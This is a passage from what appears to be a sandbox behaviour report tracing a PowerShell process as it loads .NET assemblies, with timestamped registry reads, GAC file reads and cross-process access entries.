00:04:235 Operations,
miscellaneous

Process
00:04:250 Operations, Set the priority value for a thread
miscellaneous

C:\Windows\assembly\pubpol17.dat
Files Read
00:04:329
Opened Normal

File
00:04:329 Operations, Retrieved the path of the Windows directory
miscellaneous

Registry
00:04:329 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default
Opened

Registry HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default
00:04:329
Read Latest

Registry
00:04:343 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.ConsoleHost__31bf3856ad364e35
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:343
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:343
Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:343
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:343
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:343
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:343
Read ConfigMask

Registry
00:04:343 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
Opened

Registry
00:04:343 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437
Opened

Registry HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default
00:04:343
Read LegacyPolicyTimeStamp

Registry HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default
00:04:343
Read index17

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360
Read ConfigMask

Registry
00:04:360 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37
Opened

Registry
00:04:360 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
Opened
Registry
00:04:360 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:360
Read ILDependencies

Registry
00:04:360 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
00:04:360
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
00:04:360
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
00:04:360
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
00:04:360
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
00:04:360 Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37
00:04:360
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
00:04:360
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360
Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
00:04:360
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66
00:04:360
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:360
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34
00:04:360
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34
00:04:360
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34
00:04:360
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34
00:04:360
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34
00:04:360
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34
00:04:360
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66
00:04:360
Read Status

Registry
00:04:360 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66
00:04:360
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66
00:04:360
Read Modules

Registry
00:04:360 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66
00:04:360
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37
00:04:360
Read Status
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37
00:04:360
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37
00:04:360
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37
00:04:360
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:375
Read Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
00:04:375
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
00:04:375
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
00:04:375
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
00:04:375
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
00:04:375
Read Modules

Registry
00:04:375 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
Opened

Registry
00:04:375 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
00:04:375
Read LastModTime

Registry
00:04:375 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
Opened

Registry
00:04:375 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
Opened

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:375
Read System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
00:04:375
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
00:04:375
Read Status

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:375
Read System,2.0.0.0,,b77a5c561934e089,MSIL

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
00:04:375
Read SIG

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:375 Read System.Xml,2.0.0.0,,b77a5c561934e089,MSIL

Registry
00:04:390 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.System.Management.Automation__31bf3856ad364e35
Opened

Registry
00:04:390 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration.Install__b03f5f7f11d50a3a
Opened

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:390
Read System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:390
Read System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL

Registry
00:04:421 HKLM\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
Opened

File
Searched a directory for the name:
00:04:421 Operations,
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.INI
miscellaneous

C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
Files Read
00:04:421
Opened Normal

File
00:04:454 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
miscellaneous

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70
00:04:500
Read Status

Registry
00:04:500 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70
Opened
00:04:500 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70
Read LastModTime
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500
Read EvalationData

Registry
00:04:500 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
Opened

Registry
00:04:500 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70
00:04:500
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70
00:04:500
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70
00:04:500
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:04:500
Read ConfigMask

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:515
Read System.Transactions,2.0.0.0,,b77a5c561934e089,x86

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72
00:04:515
Read Status

Registry
00:04:515 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76
Opened

Registry
00:04:515 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
Opened

Registry
00:04:515 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.DirectoryServices__b03f5f7f11d50a3a
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76
00:04:515
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72
00:04:515
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:515
Read System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76
00:04:515
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76
00:04:515
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76
00:04:515
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76
00:04:515
Read Status

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:515
Read System.DirectoryServices,2.0.0.0,,b03f5f7f11d50a3a,MSIL

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:515
Read System.Data,2.0.0.0,,b77a5c561934e089,x86

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
00:04:515
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72
00:04:515
Read LastModTime

Registry
00:04:515 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
Opened

Registry
00:04:515 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72
Opened

00:04:515 Registry HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data__b77a5c561934e089


Opened

Registry
00:04:515 Opened HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Transactions__b77a5c561934e089

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72
00:04:515
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72
00:04:515
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
00:04:515
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
00:04:515
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
00:04:515
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
00:04:515
Read DisplayName

File
Searched a directory for the name:
00:04:563 Operations,
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.INI
miscellaneous

00:04:610 Files Read C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll

File
00:04:625 Operations, Obtained the path of the Windows system directory
miscellaneous

C:\Windows\system32\l_intl.nls
Files Read
00:04:625
Opened Normal

Process powershell.exe
00:04:671
Opened VMRead & QueryInformation

00:04:671 Others Enabled/disabled privileges in an access token

searchindexer.exe
Process
00:04:688 Terminate & CreateThread & SetSessionID & VMOperation & VMRead & VMWrite & DupHandle & CreateProcess & SetQuota & SetInformation &
Opened
QueryInformation

powershell.exe
Process
00:04:688 Terminate & CreateThread & SetSessionID & VMOperation & VMRead & VMWrite & DupHandle & CreateProcess & SetQuota & SetInformation &
Opened
QueryInformation

Process
00:04:704 Operations, Retrieved system information
miscellaneous

Process
00:04:704 Operations, Obtained the identifier of the thread or process that created the specified window
miscellaneous

Process
00:04:735 Operations, Obtained the priority value for a thread
miscellaneous

C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Files Read
00:04:750
Opened Normal

C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Files Read
00:04:750
Opened Normal

Registry
00:04:782 HKLM\Software\Microsoft\PowerShell\1\PowerShellEngine
Opened

Registry
00:04:782 HKLM\Software\Microsoft\PowerShell
Opened

Registry
00:04:782 HKLM\Software\Microsoft\PowerShell\1
Opened

Registry HKLM\Software\Microsoft\PowerShell\1\PowerShellEngine
00:04:782
Read ApplicationBase

Registry
00:04:796 HKLM\Software\Microsoft\StrongName
Opened

Registry
00:04:813 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084
Opened

Registry
00:04:813 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Diagnostics__31bf3856ad364e35
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61
00:04:829
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61
00:04:829
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61
00:04:829
Read Modules
00:04:829 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38
00:04:829
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61
00:04:829
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38
00:04:829
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38
00:04:829
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38
00:04:829
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38
00:04:829
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
00:04:829
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
00:04:829
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
00:04:829
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
00:04:829
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
00:04:829
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:829
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829
Read ConfigMask

Registry
00:04:829 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:829
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:829
Read DisplayName

Registry
00:04:829 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
Opened

Registry
00:04:829 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61
Opened

Registry
00:04:829 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:829
Read EvalationData

Registry
00:04:829 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:829
Read ConfigMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:829
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:829
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:829
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:829
Read MVID
00:04:829 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:843
Read Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL

Registry
00:04:843 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.3.5.System.Core__b77a5c561934e089
Opened

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:843
Read System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL

Registry
00:04:843 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
Opened

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:843
Read System.Core,3.5.0.0,,b77a5c561934e089,MSIL

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61
00:04:843
Read LastModTime

File
00:04:860 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.INI
miscellaneous

File
Searched a directory for the name:
00:04:860 Operations,
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.INI
miscellaneous

00:04:875 Files Read C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:954
Read ILDependencies

Registry
00:04:954 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
Opened

Registry
00:04:954 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:954
Read ConfigMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:954
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:954
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:954
Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:954
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:954
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:954
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
00:04:968
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:968
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
00:04:968
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
00:04:968
Read DisplayName

Registry
00:04:968 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
Opened

Registry
00:04:985 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
Opened

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:985
Read System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL

Registry
00:04:985 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
Opened

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:985
Read System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
00:04:985
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
00:04:985
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
00:04:985
Read Modules

Registry
00:04:985 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
Opened
